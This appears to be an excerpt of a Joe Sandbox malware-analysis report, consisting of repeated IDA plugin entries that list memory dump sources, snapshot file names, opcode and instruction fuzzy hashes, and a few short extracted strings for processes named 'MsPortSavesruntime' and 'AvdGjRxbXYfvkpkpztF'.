                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c435ec07ecf514d6784a90c5784a67cedab364507c054bb60b1e910602959ba1
                                                                                                                    • Instruction ID: d03995a150cebfaa0439456c8c5444fcb636f04d95e69fa1c79bf11391da3a97
                                                                                                                    • Opcode Fuzzy Hash: c435ec07ecf514d6784a90c5784a67cedab364507c054bb60b1e910602959ba1
                                                                                                                    • Instruction Fuzzy Hash: A521F635B0D68D8FE332DBA8C8652DC7FA0EF42325F1645B7C0488B1E2D578164AC765
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 06d4c203c55d1f033b5da4dd6834321b3cb4db63cf47840347f061b17f341d53
                                                                                                                    • Instruction ID: b338aa56d2f4a4fee1b15fe75bf5ff7c3b5368759088741d039c8e1c97be5955
                                                                                                                    • Opcode Fuzzy Hash: 06d4c203c55d1f033b5da4dd6834321b3cb4db63cf47840347f061b17f341d53
                                                                                                                    • Instruction Fuzzy Hash: 4A012B36B0D4194AE328F7ACBCB58E53750EF9533F70543B3E1498D0A7EC155445C291
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bab0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e9e5cba875871d5141bed70bc16046da92049d9163bc77c0106fb09a974dbdbf
                                                                                                                    • Instruction ID: 8598fbe6f5c77e2603a15392517c24fc24743804bc2e641c436986364e2a7355
                                                                                                                    • Opcode Fuzzy Hash: e9e5cba875871d5141bed70bc16046da92049d9163bc77c0106fb09a974dbdbf
                                                                                                                    • Instruction Fuzzy Hash: 45016D13B0B66E07D719B76DEC764E47390EF5313B74C03B7D099C9193DC15A48A8680
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 63f2cd87a19940bead77b044e16d92c718e9f0a0d933ccb996656abe0fa0def7
                                                                                                                    • Instruction ID: 5425bd2342f8a19cf1bde18fc34b59f0a41ddc710a4f8d6a478a96cd64a4f2fd
                                                                                                                    • Opcode Fuzzy Hash: 63f2cd87a19940bead77b044e16d92c718e9f0a0d933ccb996656abe0fa0def7
                                                                                                                    • Instruction Fuzzy Hash: AE11C235B0E78C8FE722DBA888612DC7FB1EF82315F0645F7C088DB1A2D57416498794
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b2330b8636cabd1bbba2006da51e9c3ccd7389726c0397c04b20c7ad9d7bad70
                                                                                                                    • Instruction ID: 821c3f479d0333476ec853466de6d7ed1f74ccc3691e0c39d768fa711028d2ff
                                                                                                                    • Opcode Fuzzy Hash: b2330b8636cabd1bbba2006da51e9c3ccd7389726c0397c04b20c7ad9d7bad70
                                                                                                                    • Instruction Fuzzy Hash: 73012636B0A5060BD328A75CE8A68E07350EF5623F70903F3F0598E1B3EE199895C240
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5b29dcd7a17228f681ea722c2aa61fa5020dc57049470d5589124beda485b340
                                                                                                                    • Instruction ID: cd80cdffea41a45f230b9082060af1de332dbaa1430313248478a5bbb025f564
                                                                                                                    • Opcode Fuzzy Hash: 5b29dcd7a17228f681ea722c2aa61fa5020dc57049470d5589124beda485b340
                                                                                                                    • Instruction Fuzzy Hash: CD01DB31E4F6C84FDB559B7488A94D87FA1EF56210B4981FBD049CB1B3DD295D46C300
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: df1d69afe1c2207046c777dcbb2e859ac17933001a6634bb7b4911c78c5fafd1
                                                                                                                    • Instruction ID: 43658cab1aa5780ce813251ce21207e0092ee33fb88a875723f75095d36bc565
                                                                                                                    • Opcode Fuzzy Hash: df1d69afe1c2207046c777dcbb2e859ac17933001a6634bb7b4911c78c5fafd1
                                                                                                                    • Instruction Fuzzy Hash: 4301B532F0561E8BEB64D798C0557FDB3A1EF98714F464235E408D3194DA7C6E458BC0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b4fdabf60c609c8c4ff3b61915eea2fade738a4859b23f4c9afce176aaeb5104
                                                                                                                    • Instruction ID: c508fc9ce9a7b61c3cbbd790999bbad639dda0ec1d91a375fb36da273890f961
                                                                                                                    • Opcode Fuzzy Hash: b4fdabf60c609c8c4ff3b61915eea2fade738a4859b23f4c9afce176aaeb5104
                                                                                                                    • Instruction Fuzzy Hash: A701AD35A0E78C8FE722DBA888642DDBFB1AF42314F0645E7C084DB1A2D97456488794
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e3d33519c8249d7e5d1cdc21131ee2d65396c997bdbbaf8642a0c931e5022959
                                                                                                                    • Instruction ID: 9e3f3bf159f469e81d4661f13d33a290c295591d38eb117c46476488e2d6ae43
                                                                                                                    • Opcode Fuzzy Hash: e3d33519c8249d7e5d1cdc21131ee2d65396c997bdbbaf8642a0c931e5022959
                                                                                                                    • Instruction Fuzzy Hash: EB014F35A199198FCB59EB08C8A4AE9B3F1FB68300F15416DD04AE32A1DA34AA41CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction ID: a12660d053721b1531771840e89e9aabade80d1e136a6a126e72922a7545e160
                                                                                                                    • Opcode Fuzzy Hash: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction Fuzzy Hash: 41F03131A4D50E4AEB74EB94D4546F833A2FB94710F26417DE40ED32B6DDB86A818A14
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 00c0e08206afc7866f57bb5ac8924bb3d9ecdd219bfddbdf5cf86e29886e76ea
                                                                                                                    • Instruction ID: 9f2b28c7994fe3d845938ed9ab705898f23b1ff2e3ff436ed9b14c37307b2170
                                                                                                                    • Opcode Fuzzy Hash: 00c0e08206afc7866f57bb5ac8924bb3d9ecdd219bfddbdf5cf86e29886e76ea
                                                                                                                    • Instruction Fuzzy Hash: 71F0AB3520DA49CFD781E73DDCA54D43B50EF8320875B15FBC088C7462C210185EC700
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6b9c25bc3156df739e1d238c0d700a571b7a7b2716e6448513313c38b5aff7f6
                                                                                                                    • Instruction ID: 17bed7793eb8d575539aa79a0b67965d007c0e52b022646ec77afbc318665535
                                                                                                                    • Opcode Fuzzy Hash: 6b9c25bc3156df739e1d238c0d700a571b7a7b2716e6448513313c38b5aff7f6
                                                                                                                    • Instruction Fuzzy Hash: FD01A230A0E38C9FE722DBA488942DDBFF1AF06314F1545E7C484CB1A2D9785648C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction ID: 29bcede053835b54982e0341eb7b1837f0e0d3648e05e91d3717b3f6371a1fbb
                                                                                                                    • Opcode Fuzzy Hash: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction Fuzzy Hash: D0B01200D5740F00E43433FA089207970425B44200FC20070D40D80091D8CD32D80367
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5\_H
                                                                                                                    • API String ID: 0-3325266018
                                                                                                                    • Opcode ID: e280a4ccbd915f22bd4c48f973e94df486e9b29a4b66ac458929537e6e47585a
                                                                                                                    • Instruction ID: d9f00e5eb27d35808b17b247014b59133a66da393a04c4426287104ea028b2ea
                                                                                                                    • Opcode Fuzzy Hash: e280a4ccbd915f22bd4c48f973e94df486e9b29a4b66ac458929537e6e47585a
                                                                                                                    • Instruction Fuzzy Hash: 7A91F372A1DA8D8FE79ACF6888657A87FE1EF5A310F0501BED04DD72E6CAB815108740
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9
                                                                                                                    • API String ID: 0-3426396564
                                                                                                                    • Opcode ID: 692fec5cf8fe994caff61161acbd79f02eceeb45484e8a27b889da69a2ab0930
                                                                                                                    • Instruction ID: 36d4626213acafb45014cd13eafd31cbe7b8760e5052a3e2ea4928efd5f0a7fa
                                                                                                                    • Opcode Fuzzy Hash: 692fec5cf8fe994caff61161acbd79f02eceeb45484e8a27b889da69a2ab0930
                                                                                                                    • Instruction Fuzzy Hash: 6A01443771D55A8FE601E6BEF8508EA3B48DBCA23575606B7E044C71A2C140184E83E0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ad552982bda38a1eb10193fdfa08da03c690be2c5e4fa1cc1574df658ef7657e
                                                                                                                    • Instruction ID: d2193714a967aae03e08e1c5a4ddbd8f689d6bb6a0ca1c8d152a86c21ccb9737
                                                                                                                    • Opcode Fuzzy Hash: ad552982bda38a1eb10193fdfa08da03c690be2c5e4fa1cc1574df658ef7657e
                                                                                                                    • Instruction Fuzzy Hash: B6412822B0C5590EE724F7AC64A56F97781EF5933AB0546BBE44DCB1EBCD1868418284
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 64ace7260947eae7cd011491dc63d6555fda6fc1b74fb48fab1820e0dc2b0771
                                                                                                                    • Instruction ID: deb24630cb1f457c9954220e2c7f2a96085379b0e9b8b05dc7d4f5e6f6b67cd1
                                                                                                                    • Opcode Fuzzy Hash: 64ace7260947eae7cd011491dc63d6555fda6fc1b74fb48fab1820e0dc2b0771
                                                                                                                    • Instruction Fuzzy Hash: 74313A10B1D90E0FEB58FB68846A6B977D6EF99320F5500BDE40EC32E7DD289C418381
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 559ba8779cf88b7eecea66d77b42c8774233b3b63b84a7686768a7f3e5e5bc74
                                                                                                                    • Instruction ID: cc18d331a26f904c7d2f1e2736472aeb33262f92b0f9b7b679829f8328a62bf9
                                                                                                                    • Opcode Fuzzy Hash: 559ba8779cf88b7eecea66d77b42c8774233b3b63b84a7686768a7f3e5e5bc74
                                                                                                                    • Instruction Fuzzy Hash: 8031B531A0E68E9FDF56EB64C8649A97BF0EF26300B0905FBD009D71E3DA68A945C740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6ab075bc5ffd6244b50dfe5569e1692ab55bc4d706241e32651b990edfccd5ce
                                                                                                                    • Instruction ID: 41144fdd4fea6d8c41c434cb8954b080cbab6d5cc0c99c05913f69f980e831c5
                                                                                                                    • Opcode Fuzzy Hash: 6ab075bc5ffd6244b50dfe5569e1692ab55bc4d706241e32651b990edfccd5ce
                                                                                                                    • Instruction Fuzzy Hash: 5E218F71F1D50E4BFBB8E79884686B863A1FF48340F1241B9D54ED32B2DE786E41AB04
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a0700d956c94373e8480c26f29a4c3d21dabcf7b0c6ad74aabc5b56f392745e9
                                                                                                                    • Instruction ID: 15e7015dc29ab1eaa3fb8bbf52a81caa49b1b9e240e9446454a12c1e03c37b18
                                                                                                                    • Opcode Fuzzy Hash: a0700d956c94373e8480c26f29a4c3d21dabcf7b0c6ad74aabc5b56f392745e9
                                                                                                                    • Instruction Fuzzy Hash: 23210132A0E28D8FE732DBA8C8651DC7FB0DF42364F1641B7C0909B1E2DA78164AD355
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 496267b095b3f3d46eb01520270fcc65ab2fe22cbda5735a09455040edb06884
                                                                                                                    • Instruction ID: add5ab6baf245fdfbf7a2a263f2ea8435773f734d83a72617712515861a4e4bc
                                                                                                                    • Opcode Fuzzy Hash: 496267b095b3f3d46eb01520270fcc65ab2fe22cbda5735a09455040edb06884
                                                                                                                    • Instruction Fuzzy Hash: 6411CE31A0E78D8FE722DBA8C8652DD7FB0AF42314F1645F7C094DB2A2D97416498784
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 296f8888e47da523da54a174002d44a851327c523c6a19a861267ee44ada8b2b
                                                                                                                    • Instruction ID: 5415913d41c6487eef45d109c4e6e411eaf2b9db0bce721daf4bf5efd9fa23cc
                                                                                                                    • Opcode Fuzzy Hash: 296f8888e47da523da54a174002d44a851327c523c6a19a861267ee44ada8b2b
                                                                                                                    • Instruction Fuzzy Hash: E101C031A0E78C8FE722DBA8C8642DD7FB0AF42314F1645E7C494DB2A2D9745649C784
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 687b9d9874a0b158ae55e2d41c53763813932427dd081fa52e42f3d25bb1bed5
                                                                                                                    • Instruction ID: b785b8fb07b1126fe73dabef306d2eaf7a2b9307f570f29e9f281156878d9fda
                                                                                                                    • Opcode Fuzzy Hash: 687b9d9874a0b158ae55e2d41c53763813932427dd081fa52e42f3d25bb1bed5
                                                                                                                    • Instruction Fuzzy Hash: B3014F31A199198FCB69EB08C8A4AE9B3F1FF58300F11416DD04ED32A1CE34AA41CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction ID: b05b622aed075035dca605061a9e6880d340e493b3d7fd3e236d7698d0fb2b62
                                                                                                                    • Opcode Fuzzy Hash: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction Fuzzy Hash: D3F03131A4D50E4BEB78EB94D4946E833A1FB95310F22417DD50ED32B6DDB86A819A04
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8885b476f920996b9802a1a4b00f62ad2a4634ae42c8d86c18c56624388bcb60
                                                                                                                    • Instruction ID: 365e8c85c38a24ac29b6c8357bcd9c2611f091462742bdfe118332074bc88151
                                                                                                                    • Opcode Fuzzy Hash: 8885b476f920996b9802a1a4b00f62ad2a4634ae42c8d86c18c56624388bcb60
                                                                                                                    • Instruction Fuzzy Hash: 3CF0E53560D6498FD745E77DDCA54E53B50EB8721975715FBD088C7463C250085EC700
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 55450da4dd73264885f9dbff5398f02c4013d43db3472fffe4c44740b348a1d8
                                                                                                                    • Instruction ID: 256823d1e0e3a155cffd1e6f53525a784de97c1d86ff614f1059d97f57cdbb9e
                                                                                                                    • Opcode Fuzzy Hash: 55450da4dd73264885f9dbff5398f02c4013d43db3472fffe4c44740b348a1d8
                                                                                                                    • Instruction Fuzzy Hash: 0A01A230A0E78D8FE722DBA488542DDBFF0AF02314F1541E7C490CB2A6D9785748C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000020.00000002.2983660265.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_32_2_7ffd9ba90000_MsPortSavesruntime.jbxd
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000032.00000002.2375142815.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_50_2_7ffd9baa0000_AvdGjRxbXYfvkpkpztF.jbxd